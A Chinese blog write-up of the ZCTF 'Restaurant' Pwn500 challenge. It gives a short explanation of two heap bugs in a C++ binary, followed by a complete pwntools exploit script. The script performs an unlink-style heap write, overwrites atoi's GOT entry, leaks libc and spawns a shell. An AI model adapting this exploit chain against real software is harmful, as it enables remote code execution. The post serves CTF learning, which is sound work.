版权声明:本文为博主原创文章,未经博主允许不得转载。

 这道压轴的题也是名副其实,很有分量。这也是自己第二次做C++类型的PWN。含有两个漏洞,缺一不可,一个漏洞将指定位置覆盖为对象虚表的地址,另外一个漏洞用来堆溢出(DW-Shoot)。

第一个漏洞所在位置:

第二个漏洞所在位置:如果连续对一种食物编辑评论,第二次则可以8字节的溢出,覆盖下一个堆块的堆头。

由于堆块在分配时的对齐策略,堆块分配后可以使用的内存可能比申请的要大。这道题目中,主食/主菜/汤都有3个种类,只有同时能选中主食的第二种,主菜的第二种才能溢出,而这个选择是随机的,POC所以并不能每次都成功,我这个POC成功的概率为1/9,其实多试几次就能顺利拿到shell。我大概试了3-4次就拿到了shell。上图:

 from pwn import *

 import time

 #by wangaohui

 #context.log_level = 'debug'

 s= remote('127.0.0.1',10001)

 time.sleep(2)

 print 'pid of restaurant is :' + str(pwnlib.util.proc.pidof('restaurant')[0])

 raw_input('go!')

 s.recvuntil('Please enter your name: ')

 s.sendline('/bin/sh;')

 s.recvuntil('you are the luckey ')

 heap = int(s.recvuntil('th guest.\n')[:-10])

 print 'heapaddr is %x' %heap

 s.recvuntil('Are you from China? (y/n) ')

 s.sendline('n')

 s.recvuntil('please enter your country: ');

 vtp = 0x404710

 data = 'a'*10 + '\x00' + 'a'*5 + '\x1c\x47\x40\x00'

 s.sendline(data)

 s.recvuntil('How old are you: ')

 s.sendline('')

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('Successfully order a staple food, enjoy it!')

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('Successfully order an entree, enjoy it!')

 '''

 s.recvuntil('8. Finish your order.')

 s.sendline('3')

 s.recvuntil('Successfully order a staple food, enjoy it!')

 '''

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')

 s.sendline('')

 s.recvuntil('How does this dish look: ')

 s.sendline('xxx')

 s.recvuntil('How does this dish taste: ')

 s.sendline('yyy')

 fakefd = heap + 0x20

 fakebk = heap + 0x28

 appcom = 'a'*40 + p64(0x80) + p64(0x90)

 tastecom = p64(0x81) + p64(fakefd) + p64(fakebk)

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')

 s.sendline('')

 s.recvuntil('How does this dish look: ')

 s.sendline(appcom)

 s.recvuntil('How does this dish taste: ')

 s.sendline(tastecom)

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('want to cancel(1,2 or 3 depend on menu): ')

 s.sendline('')

 s.recvuntil('the chef has already started to cook.')

 appcom = 'xxx'

 tastecom = p64(0x6060A0)#atoi's got

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')

 s.sendline('')

 s.recvuntil('How does this dish look: ')

 s.sendline(appcom)

 s.recvuntil('How does this dish taste: ')

 s.sendline(tastecom)

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('Your age: ')

 atoiaddr = int(s.recvuntil('\n')[:-1])

 print 'atoiaddr is:  %x' % atoiaddr

 systemaddr = atoiaddr - 0x36360 + 0x414F0

 print 'systemaddr is:  %x' % systemaddr

 appcom = 'xxx'

 tastecom = 'a'*8 + p64(systemaddr)

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')

 s.sendline('')

 s.recvuntil('How does this dish look: ')

 s.sendline(appcom)

 s.recvuntil('How does this dish taste: ')

 s.sendline(tastecom)

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('3.Just so so!')

 s.sendline('3.Just so so!')

 s.recvuntil('Thank you for your comment,bye!')

 s.interactive()

ZCTF-Restaurant-Pwn500的更多相关文章

  1. CodeForces - 261B Maxim and Restaurant

    http://codeforces.com/problemset/problem/261/B 题目大意:给定n个数a1-an(n<=50,ai<=50),随机打乱后,记Si=a1+a2+a ...

  2. Flo's Restaurant[HDU1103]

    Flo's Restaurant Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/32768 K (Java/Others) ...

  3. Codeforces Testing Round #12 B. Restaurant 贪心

    B. Restaurant Time Limit: 20 Sec Memory Limit: 256 MB 题目连接 http://codeforces.com/contest/597/problem ...

  4. HDU-2368 Alfredo's Pizza Restaurant

    http://acm.hdu.edu.cn/status.php Alfredo's Pizza Restaurant Time Limit: 1000/1000 MS (Java/Others)   ...

  5. hdoj 4883 TIANKENG’s restaurant【贪心区间覆盖】

    TIANKENG’s restaurant Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 131072/65536 K (Java/O ...

  6. hdu2368Alfredo's Pizza Restaurant

    Problem Description Traditionally after the Local Contest, judges and contestants go to their favour ...

  7. HDOJ 4883 TIANKENG’s restaurant

    称号: TIANKENG's restaurant Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 131072/65536 K (Ja ...

  8. Restaurant

    Restaurant Time Limit:4000MS     Memory Limit:262144KB     64bit IO Format:%I64d & %I64u Submit  ...

  9. 九校联考_24OI——餐馆restaurant

    凉心模拟D1T1--最简单的一道题 TAT 餐馆(restaurant) 题目背景 铜企鹅是企鹅餐馆的老板,他正在计划如何使得自己本年度收益增加. 题目描述 共有n 种食材,一份食材i 需要花ti 小 ...

  10. Codeforces828 A. Restaurant Tables

    A. Restaurant Tables time limit per test 1 second memory limit per test 256 megabytes input standard ...

随机推荐

  1. c-100米球反弹

    #include <iostream> #define TIMES 10 int main(void) { ; ; //第一次反弹的高度. ; i <= TIMES; i++) { ...

  2. Nagios设置只监控不报警

    设置全部监控项都开启邮件报警: vim /usr/local/nagios/etc/nagios.cfg 设置 enable_notifications=1    1为开启,0为关闭     如个别监 ...

  3. Swift语言 代码添加文本输入框 和 占位文本

    //懒加载文本输入框 private lazy var textView: UITextView = { let textView = UITextView() textView.font = UIF ...

  4. php中双$$与多$$

    <?php$a="b";$b="bbb";$c="ccc";echo $$a;?> 输出结果bbb $a的值为b $$a不是输出 ...

  5. ruby on rails 中render的使用

    最近写ror,因为比较菜,很多东西不知道,只能看一点查一点了 render 先上点搜集的常用方式 render :action => "long_goal", :layout ...

  6. 基础知识 mfc

    句柄 资源的标示  图标句柄(HICON) 光标句柄(HCURSOR) 窗口句柄(HWND) 类似于指针 wm_keydown表示键盘上的按键按下了数值 WPARAM ||LPARAM  两个整形数据 ...

  7. 由setTimeout()里的this引出的this

    example 1: window.id='windowid'; function M(){ this.id='Mid'; this.f1=function(){console.log(this.id ...

  8. 【学习笔记】【oc】类和对象及类的三大基本特征

    1.类和对象 类是抽象化,对象是具体化. (1)定义类: 分为两个步骤,类的声明:定义类的成员变量和方法:@interface 用于声明定义类的接口部分,@end表面定义结束:. 成员变量的定义:{} ...

  9. linux2.6.32 内核源码树解析与整理

    一 系统最核心组件目录: 1 arch目录该目录中的每个子目录中都与某种体系结构相对应,用于存放体系结构相关代码,向平台无关的系统核心模块提供所需的功能接口.每个体系结构对应的子目录下通常至少包含以下 ...

  10. Android系统的进程分类

    1.前台进程:即当前正在前台运行的进程,说明用户当前正在与通过该进程与系统进行交互,所以该进程为最重要的进程,除非系统的内容已经到不堪重负的情况,否则系统是不会将改进程终止的.2.可见进程:一般还是显 ...